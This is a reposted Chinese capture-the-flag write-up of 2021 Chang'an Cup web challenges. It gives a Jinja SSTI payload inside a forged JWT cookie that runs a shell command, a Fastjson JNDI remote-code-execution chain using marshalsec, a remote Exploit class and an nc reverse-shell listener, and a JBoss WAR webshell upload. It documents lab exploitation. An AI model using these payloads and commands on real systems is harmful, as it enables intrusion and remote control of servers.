首页 > 其他分享 >2021长安杯web复现

2021长安杯web复现

时间:2022-11-17 10:06:33浏览次数:50  
标签:__ web shell java 端口 Exploit 2021 war 复现


2021长安杯web复现_ctf

ez_py

随便输一个账密,进入后台,存在 jwt,使用 jwt crack 暴力,得到 secret 是 CTf4r

2021长安杯web复现_python_02

登进去,发现啥东西没有,既然是 python 考点大概是 ssti,寻找注入点就是 user,绕过过滤,构造 payload

2021长安杯web复现_长安杯_03

eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VyIjoiP25hbWU9e3soeHxhdHRyKHJlcXVlc3QuY29va2llcy54MSl8YXR0cihyZXF1ZXN0LmNvb2tpZXMueDIpfGF0dHIocmVxdWVzdC5jb29raWVzLngzKSkocmVxdWVzdC5jb29raWVzLng0KS5ldmFsKHJlcXVlc3QuY29va2llcy54NSl9fSIsInVpZCI6IjRlN2NkNDg1LTU2YjctNDYwYS1iMzIwLTFiZWViZjdkYzJmMSIsInBhc3N3ZCI6IjEyMzQ1NiIsInJvbGUiOiJhZG1pbiJ9.yY3dIUG0_3tOMivjLg_DDKBdrH1jsqFrTG-B1FXbU2U;x1=__init__;x2=__globals__;x3=__getitem__;x4=__builtins__;x5=__import__('os').popen('cat /flag').read()

用 burp 抓包替换 cookie

2021长安杯web复现_长安杯_04

得到 flag

soseay

fastjson rce复现

下载 fastjson-1.2.47-RCE-master

把文件复制到服务器(需要Java环境)

更改 Exploit.java 文件

2021长安杯web复现_python_05

编译Exploit.java文件,在exploit.java目录下,输入命令:javac ./Exploit.java,会生成一个Exploit.class文件,将以下三个文件放在同一个目录下

2021长安杯web复现_长安杯_06

python开启web服务

2021长安杯web复现_web安全_07

注意python2和3命令不相同

端口可任意,注意需要与上面三个文件同一路径下开启web服务
python -m SimpleHTTPServer 1111 (python2)
python -m http.server 1111 (python3)

可以在浏览器访问下看看文件生成了么

开启rmi服务

利用marshalsec文件开启rmi服务

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer "http://121.196.173.254:1111/#Exploit" 23333

# 1111 端口是 python web 服务的端口
# 23333 是任意端口

2021长安杯web复现_ctf_08

nc开启端口监听

注意监听端口与exploit.java文件中的端口一致,看一下 exploit.java 中的端口

nc -lvp 8888

反弹 shell

使用 burp 带上 exp 去访问靶机,注意反弹 shell 端口是 ldap 端口

{
"a":{
"@type":"java.lang.Class",
"val":"com.sun.rowset.JdbcRowSetImpl"
},
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://vpsIP:23333/Exploit",
"autoCommit":true
}
}


Fastjson<=1.2.24
步骤与1.2.47一样,只是最后的poc不同
{
"b":{
"@type":"com.sun.rowset.JdbcRowSetImpl",
"dataSourceName":"rmi://vpsIP:9999/Exploit",
"autoCommit":true
}
}

发包

2021长安杯web复现_长安杯_09

成功拿到 shell

2021长安杯web复现_web安全_10

Old But A Little New

Jboss5.x/6.x-后台上传war包getshell

弱口令进后台

后台可以上传 war 包

2021长安杯web复现_ctf_11

首先去制作一个 war 包

jar cvf shell.war shell.jsp

# 或者直接打包shell.jsp成shell.zip,然后shell.zip直接改格式改成shell.war

部署 war 包,选择生成好的文件

2021长安杯web复现_python_12

部署成功是可以看到的

2021长安杯web复现_web安全_13

使用冰蝎访问

2021长安杯web复现_长安杯_14

asuka

和上题的方法一模一样,非预期了。。。


标签:__,web,shell,java,端口,Exploit,2021,war,复现
From: https://blog.51cto.com/u_15878568/5859829

相关文章

  • 2021湖湘杯easy&&深育杯WEBLog
    文章目录​​湖湘杯easy​​​​深育杯WEBLog​​湖湘杯easy<?phpnamespacehome\controller;classIndexController{publicfunctionindex(){highlight_file(......
  • WebSocket
    1<?php23/*4BasedonPHPWebSocketServer0.25-http://code.google.com/p/php-websocket-server/6-http://code.google.com/p/......
  • python web自动化-文件上传三种方法
    文件上传三种方式:(一)查看元素标签,如果是input,则可以参照文本框输入的形式进行文件上传方法:和用户输入是一样的,使用send_keys步骤:1、找到定位元素,2,输入文件路径ele=driv......
  • 一、中国数据中台行业白皮书(2021年)
    数据中台不是简单的一套软件系统或者标准化产品,更多的是一种强调资源整合、集中配置、能力沉淀、分步执行的运作机制,是一系列数据组件或模块的集合,为企业数据治理效率的提......
  • Web3 时代的微信
    Web3.0正在向人们的生活逼近,那么在Web3下,人们的社交状态会是什么样的?也许,你可以看看Discord这款社交产品。所以,你了解Discord是什么吗?这款音频聊天工具又是为什么可以......
  • Web核心之Http,tomcat,servlet
    Http,Tomcat和Servlethttp是超文本传输协议,规定了浏览器和服务器之间的数据传输规则,而他与服务器之间的有请求数据和响应数据的工作。 请求数据的格式:1.请求行:请求数据......
  • 使用Metaweblog上传MD文件到博客园遇到的几个问题
    can'topenfile'upload.py':[Errno2]Nosuchfileordirectory分析:upload.py文件在pycnblog源代码文件夹下,而cmd命令的执行路径是C:\WINDOWS\System32,所以提示找不......
  • 使用 Nginx 如何部署 web 项目
    第一步:前往Nginx官方下载Nginx资源包,建议下载Stableversion(长期稳定版本)   第二步:将Nginx压缩包解压到本地目录中(D:\Tools)   第三步:进入到已经解压......
  • spingboot10(切换内置web服务器)
    1-我们在使用SpringBoot_Web的使用默认会使用"Tomcat"服务器2-查看SpringBoot服务器的内置种类解析:知道了SpringBoot的4种服务器种类,现在就可以选择切换......
  • 分享:大型Web网站架构演变之9大阶段
    前言我们以JavaWeb为例,来搭建一个简单的电商系统,看看这个系统可以如何一步步演变。该系统具备的功能:用户模块:用户注册和管理商品模块:商品展示和管理交易模块:创建交易和管理......